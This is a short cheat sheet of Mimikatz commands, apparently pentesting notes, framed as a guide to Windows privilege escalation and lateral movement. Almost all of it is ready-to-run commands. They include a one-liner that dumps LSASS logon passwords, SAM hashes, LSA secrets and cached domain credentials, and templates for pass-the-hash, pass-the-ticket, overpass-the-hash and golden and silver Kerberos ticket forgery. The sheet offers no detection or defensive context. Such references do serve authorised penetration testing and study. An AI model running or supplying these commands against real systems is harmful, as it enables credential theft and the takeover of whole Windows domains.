πŸ₯Mimikatz Basics

Mimikatz is a powerful tool to extract plaintext credentials, hashes, and Kerberos tickets from memory. Reading LSASS requires local Administrator or SYSTEM rights (and SeDebugPrivilege, which is why the commands below start with privilege::debug and token::elevate), and the tool is a staple of Windows privilege escalation and lateral movement.

Basic Commands

mimikatz.exe
privilege::debug
token::elevate

Extracting Credentials

Oneliner

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Get NTLM Hashes from LSASS

sekurlsa::logonpasswords

Dump Kerberos Tickets

sekurlsa::tickets /export

Dump Credential Manager

vault::cred

SAM Database

lsadump::sam

LSA Secrets

lsadump::secrets

Cached Domain Credentials

lsadump::cache

Lateral Movement

Pass-the-Hash Attack

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>

Pass-the-Ticket

kerberos::ptt <ticket.kirbi>

Golden Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain SID> /krbtgt:<krbtgt hash> /id:<RID> /target:<target FQDN> /renewmax:<duration> /ptt

Silver Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain SID> /service:<service> /target:<target FQDN> /rc4:<hash> /id:<RID> /ptt

Overpass-the-Hash

sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES key> /run:<command>
